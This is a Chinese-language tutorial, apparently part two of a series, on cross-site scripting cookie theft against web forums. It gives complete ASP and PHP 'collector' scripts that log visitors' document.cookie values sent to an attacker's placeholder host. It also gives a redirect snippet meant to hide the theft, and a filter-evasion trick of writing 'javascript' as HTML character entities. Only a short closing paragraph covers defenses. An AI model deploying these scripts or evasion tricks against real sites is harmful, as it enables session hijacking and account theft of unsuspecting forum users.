简单分析Script脚本跨站攻击漏洞技术(2)

　　其中http://xxx.xxx.xxx/是大家自己网站空间，cookies.asp是一个asp脚本用于收集

　　msg后边跟的参数，而参数我们指定的是document.cookie，也就是访问此贴用户的cookie。

　　cookies.asp的代码是：
<%

　　testfile=Server.MapPath("hun.txt")

　　msg=Request("msg")

　　set fs=server.CreateObject("scripting.filesystemobject")

　　set thisfile=fs.OpenTextFile(testfile,8,True,0)

　　thisfile.WriteLine(""&msg& "")

　　thisfile.close

　　set fs = nothing

　　%> 

　　这样所有访问者的cookie都会收集在hun.txt这个文件里

　　但是访问者访问我们的帖子，同样会访问到我们的网站的，这样不是露馅了吗？呵呵，但只要我们稍做处理

　　就可以做的相对真实，比如我们加上下面的代码

　　<script language=vbscript> 
window.location.href="http://xxx.xxx.xxx" 
</script>

　　这个xxx.xxx.xxx最好换成你攻击的网站的域名，这样做的目的是在他访问我们精心构造的网站同时开打他

　　自己的网站，呵呵，这样是不是会更隐蔽一点呢？

　　这个cookies.asp和有一个同样作用的cookies.php一样，附代码如下：
<?php 
$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("cookies.txt","a"); 
fwrite($fp,$info."\n"); 
fclose($fp); 
} 
?>  

　　但是大部份做的不错的论坛，都过滤了javascript这些字符。不过还是有方法可以利用的，

　　可以在论坛发的贴里将javascript写成ascii码。像j可以写成”&#x6a;” 
    
　　防范的方法，就是过滤字符像javascript/<script>/’/;/&/#了等等，

　　当然前提是你的网页还要正常显示。建议大家不要轻易打开一些不明url，要将自己的信箱、论坛、QQ等资料的密码设的都不一样，

　　如果一旦资料或密码被盗，避免引连锁反应，所有资料和密码都被别人获得。这就要用到博大精深是社会工程学了。

　　  总结一下吧。跨站的技巧性很强，呵呵大家多积累经验用起来会达到事半功倍的效果。